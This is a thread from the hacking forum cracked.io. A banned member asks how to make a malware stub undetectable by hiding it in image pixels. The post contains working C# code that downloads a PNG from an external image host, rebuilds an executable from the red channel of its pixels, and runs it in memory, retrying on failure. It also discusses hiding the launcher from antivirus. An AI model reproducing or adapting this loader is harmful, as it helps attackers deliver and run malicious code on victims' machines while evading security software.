Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!

cracked.io | Best Forum Around | Free Premium Accounts




 2318

Run stub from image pixels

by PhoenixUG9 - 10 April, 2023 - 06:29 PM
This post is by a banned member (PhoenixUG9) - Unhide
135
Posts
30
Threads
1 Year of service
#1
(This post was last modified: 10 April, 2023 - 06:31 PM by PhoenixUG9. Edited 1 time in total.)
I've been sitting today for a couple of hours thinking of a new idea and running my stub through pixels.
In essence, this will be fud, since the antivirus will not be able to receive any data, but at the same time, you need some kind of hidden form to run it and provide fud.

If I make a form to which I assign the critical hidding code, then the antivirus will obviously complain about it, there are no other options, what do you think about this?

EDIT: 
I forgot to add that you can convert exe to image in many ways, but I use the program exe to red pixels
 
Code:
 
public void Pixel(string class2 = "https://i.ibb.co/FBW3WMK/myimage.png")
{
    try
    {
        ServicePointManager.Expect100Continue = true;
        ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
        ServicePointManager.DefaultConnectionLimit = 9999;
    }
    catch (Exception ex)
    {
        Debug.WriteLine(ex.Message);
    }
    try
    {
    A:
        ;
        Bitmap B;
        var list = new List<byte>();
        var web = new WebClient();
        B = Image.FromStream(web.OpenRead(class2));
        object i;
        var loopTo = B.Width - 1;
        for (i = 0; i <= loopTo; i++)
            list.Add(B.GetPixel(i, 0).R);
        Assembly.Load(list.ToArray()).EntryPoint.Invoke(null, (object[])null);
    }
    catch (Exception ex)
    {
        Debug.WriteLine(ex.Message);
        System.Threading.Thread.Sleep(5000);
        goto A;
    }
}
This post is by a banned member (PhoenixUG9) - Unhide
135
Posts
30
Threads
1 Year of service
#2
del this
<a>
This post is by a banned member (PhoenixUG9) - Unhide
135
Posts
30
Threads
1 Year of service
Bumped #3
This is a bump

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)